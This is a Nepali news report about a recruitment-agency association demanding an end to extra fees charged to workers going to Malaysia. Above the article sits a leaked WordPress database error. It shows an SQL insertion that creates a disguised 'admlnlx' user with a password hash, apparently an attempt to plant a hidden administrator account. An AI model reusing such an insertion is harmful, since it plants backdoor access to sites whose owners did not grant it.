WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU7MmHlAV1hc1kRwB3naI00wXHPHO91', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:45:46', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २३–
नेपाल वैदेशिक रोजगार व्यवसायी सङ्घले मलेसिया जाने नेपाली कामदारबाट अवैध रुपमा विभिन्न संस्थाले उठाउँदै आएको रकम लिन बन्द नगरे सो देशमा कामदार पठाउन रोक लगाउनुपर्ने माग गरेको छ ।
सङ्घले माइग्राम, ओएससी, आइएससी, बायोमेट्रिक प्रणालीलगायतका नाममा लिइँदै आएको रकम फागुन २५ गते हटाउन मलेसियाको सरकारसँग कूटनीतिक पहल गर्नुपर्ने र सो नहटाएमा आगामी चैत १ गतेदेखि मलेसियामा कामदार पठाउन रोक लगाउनुपर्ने मागसहितको ज्ञापनपत्र श्रम तथा रोजगारमन्त्री सूर्यमान गुरुङलाई आज बुझाएको छ ।
अवैध रकम उठाउने ती संस्था बन्द नगरिए वैदेशिक रोजगार विभाग, काठमाडौँ कार्यालयबाट दिइने पूर्व र अन्तिम श्रम स्वीकृति बन्द गरिनुपर्ने ज्ञापनपत्रमा उल्लेख छ ।
मलेसिया जाने कामदारबाट संस्थाले प्रति कामदार थप रु १७ हजार ५०० अतिरिक्त रकम उठाउँदै आएका छन् । संसद्को अन्तर्राष्ट्रिय सम्बन्ध तथा श्रम समितिले दुई महिनाअघि नै माइग्राम, ओएसीलगायत संस्थाले कामदारबाट अवैध रुपमा रकम उठाइरहेको भन्दै ती संस्थालाई कारबाही गर्न गृह मन्त्रालयलाई निर्देशन दिएको थियो । –रासस